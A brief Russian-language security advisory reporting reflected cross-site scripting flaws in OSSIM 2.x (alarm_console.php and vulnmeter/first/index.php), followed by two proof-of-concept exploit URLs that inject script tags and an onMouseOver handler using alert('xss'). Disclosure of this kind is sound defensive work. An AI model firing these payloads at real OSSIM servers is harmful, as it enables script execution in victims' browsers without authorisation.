Программа: OSSIM (AlienVault Open Source SIM) 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценариями control_panel/alarm_console.php и vulnmeter/first/index.php.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Эксплоит:

http://ossim-server/ossim/control_panel/alarm_console.php/"><script>alert('xss')</script>

http://ossim-server/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');//

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии